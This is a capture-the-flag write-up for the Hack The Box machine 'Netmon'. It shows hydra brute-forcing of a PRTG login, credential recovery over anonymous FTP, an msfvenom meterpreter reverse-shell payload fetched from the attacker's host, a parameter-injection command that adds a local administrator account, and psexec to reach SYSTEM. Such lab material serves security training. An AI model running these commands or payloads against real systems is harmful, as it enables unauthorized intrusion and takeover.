Link: https://app.hackthebox.eu/machines/177
Enumeration
Our full nmap scan reveals 13 open ports, including an ftp server and web server.
Web Server
Upon loading the web server, we are greeted with the login to PRTG Network Monitor v18.1.37.13946.
Looking at the documentation, the default user and pass is prtgadmin / prtgadmin. Unfortunately for us, these credentials do not work. However I am willing to bet the username still exists so we can use hydra to brute force:
hydra -l prtgadmin -P /usr/share/wordlists/rockyou.txt 10.129.1.126 http-post-form "/public/checklogin.htm:username=^USER^&password=^PASS^:Your login has failed." -VFTP Server
While hydra is running, I went ahead to check out the ftp server. It turns out they have anonymous login enabled and the entire C:\ drive is the share. So by navigating to C:\Users\Public we can see our first flag. Let’s grab it using get user.txt /home/kali/user.txt
Hopefully we can find more stuff her like perhaps the prtgadmin credentials. According to the documentation, we can find some files in C:\Program Files (X86)\PRTG Network Monitor. I did find the setup log, we can see they set the admin email to [email protected].
There’s also a firewall rule stating PRTG Administrator.exe is allowed through the firewall. This application would allow us to reset the password:
While investigating the option for a remote probe, I stumbled upon a screenshot of the default conf location which is C:\ProgramData\Paessler:
While this folder is hidden to FTP, we can manually type it in and we can grab a PRTG Configuration.dat. This file has the information for the admin account!
However, I do not have a clue on how to deconstruct it. I searched for password and there are others in the file, but also encrypted. The same goes for the .old file. However in the .old.bak file there is a plaintext password:
<dbpassword>
<!--- User: prtgadmin --->
PrTg@dmin2018
</dbpassword>This password does not work on the admin panel but this file was saved in 2018 and now it is 2019, so if we increment the year it does log us in!
CVE-2018-9276 (Failed)
After some google searching, I found a proof of concept for submitting a payload using the Add HTTP Advanced Sensor module and executing it via the EXE/Script Sensor module.
First, let’s generate a payload:
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.x.x LPORT=4443 -f exe > shell.exeNow we need to set up our handler for the meterpreter shell:
$ msfconsole
use exploit/multi/handler
set payload windows/meterpreter_reverse_tcp
set LHOST 10.10.x.x
Now I added a new HTTP Advanced Sensor:
- URL: http://10.10.x.x:8000/shell.exe
- Method: GET
- HTTP Monitoring Engine: Alternate/Compatibility Mode
- Proxy Settings: Disable Inherit
- Proxy Port: 80″ “-proxy=”127.0.0.1:80” -writeresult=\\127.0.0.1\\C$\\Program Files (X86)\PRTG Network Monitor\Custom Sensors\EXE\CVE-2018-19204.exe
Now we can see the python web server showing the GET requests where it grabs the shell, however after attempting this for almost a half hour, it doesn’t seem to actually be writing the result to the drive so let’s check out another CVE.
CVE-2018-9276 (Success!)
Fortunately, this software has no shortage of CVEs. Another one where we can send commands, like create our own admin account.
We need to go to Setup > Account Settings > Notifications
Then Add a New Notification. Scroll down to Execute Program file, we can inject the parameter, so I did like so:
test.txt;net user lolacct h4cked! /add;net localgroup administrators lolacct /addBack on the list of notifications, let’s click the icon on the right of our notification and then click the bell to execute it.
Next I fired up msfconsole and let’s get a meterpreter shell:
use exploit windows/smb/psexec
set LHOST 10.10.x.x
set SMBUser lolacct
set SMBPass h4cked!
set RHOSTS 10.129.1.126
runAnd we get a meterpreter shell!
Typing shell and then whoami shows we have nt authority\system. We can navigate to the Administrator’s Desktop for the root flag!
